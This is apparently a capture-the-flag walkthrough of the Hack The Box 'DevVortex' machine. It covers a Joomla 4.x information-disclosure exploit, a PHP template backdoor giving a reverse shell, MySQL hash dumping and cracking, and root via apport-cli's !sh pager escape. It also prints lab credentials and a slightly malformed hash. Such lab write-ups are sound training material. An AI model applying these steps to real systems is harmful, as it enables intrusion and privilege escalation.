โHackMD
Hello fellow hacker,just got bored then i thought i should write something for the sake of infosec people. DevVortex is seasonal 3 machine from HTB rated easy but somehow is not kinda easy but on the other side kinda very easy.
OBJECTIVE
- Sub-domain enumeration
- Enumerating services and version(joomla cms)
- Exploiting joomla v4.x
- Cracking hash offline and online
- RCE via backdoor
- Exploit apport-cli binary
Lets begin our pentesting now
STEP 1: SCANNING
As always,were only given an ip(10.10.11.242) address so we need to move from here and exploit the system.
lets scan the target first.
We got 2 open port from our first scanning.
port 22 (ssh)
port 80 (web server)
from here lets move into enumeration and dissecting our target.
STEP 2:ENUMERATION
From port 22 is secure remote protocol so definitly we need creds to login in here but we have no creds, so lets move into another port
port 80 is a web server (add the ip add into your /etc/hosts)
If we browser to our domain we get this thing
Oky lets move on and try to check any interesting directories here
I Didn't find anything interesting here with this domain, so i decide to enumerate sub-domains and see if i can get anything to cook and roast.
And i found some sexy old sub-domains here to dance with, lets add this into our /etc/hosts and see what we can find in there maybe some juice information.
Lets try something normally when i see a sub-domain i do its(robots.txt and source code).
robots.txt have some juice information ,so lets check it out. But source code nothing cool out there.
STEP 3:FOOTHOLDING
They are using joomla as there cms for more information about joomla check out this
After the struggle of here and there with every direcotry i got the administrator directory and it was the most interesting one for me.
Got the login page for administrator, but so far we have no any user creds i stucked( default creds were not working here) and I decide to take some break first here.
Here i got stucked again because i didn't have the version of the joomla atleast i can google for its exploit,i decide to fire-up my terminal and run gobuster for searching directories again and last i found README.txt
Now we got some juice (joomla 4.x) and if you google it you will find it is vulnerable to Unauthenticated information disclosure
STEP 4:EXPLOITATION
Download the exploit from exploit-db and run the exploit
command: ruby 51334.py http://dev.devvortex.htb
OUTPUT
And we got the database juice information but also the site itself
And now we have some creds after a long wait, lets try to login as lewis.
we got some users here:
user1:lewis (administrator)
user2: logan (user via ssh )
After moving around, i found a template page where i can edit and input my backdoor and get a shell.
Lets edit the error.php page,copy your exploit and input it there
Now we need to set a netcat listerner in our terminal and activate the exploit from this path(/templates/cassiopeia/error.php)
And now we got the reverse shell
Lets stablelize our shell into something interactive
Lets see what kind of user we are present in this system(file=/etc/passwd)
We got 2 interactive user with shell root and logan. Moving direct to root is insane method so lets start with user logan.
If we run the below (netstat -l), we will observe that we have a mysql port running(33060), And to conferm the mysql creds you can find them in the in form of plaintext /var/www/dev.devvortex/configuration.php
mysql creds:
mysql_user:lewis
mysql_password:REDACTED
Lets access mysql server and dump some users data here.
After we have got access to the mysql try we can try to dump the table=sd4fg_users FROM database=joomla
After dumping the the table (sd4fg_users) you will get the folling output.
Now lets crack the user logan because he is the one with the access with ssh and we need that remote access.
username:logan
hash:$2yIT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
cracked_hash:tequieromucho
And now we need to login via ssh
username:logan@devvortex.htb
password:tequieromucho
STEP 5:PRIVILEGE ESCALATION
Privilege esclation was simple
command: sudo -l
After googling i found out this PoC usefully here.
If we read this article here Reference, We will understand that the binary collects data from crashed processes and compiles a problem report in /var/crash/
So in order to abuse this binary we need to specify any filename of our choice and try to force the binary to enter in a view report and there we can execute(!sh) to gain root access
I have just specify a file named pewpew.log using option -c
And finally we got root access by abusing the binary.
HACK THE PLANET GUYS(By alienkeric AKA alienX)
If you have any qns ping me from here
Twitter AKA X
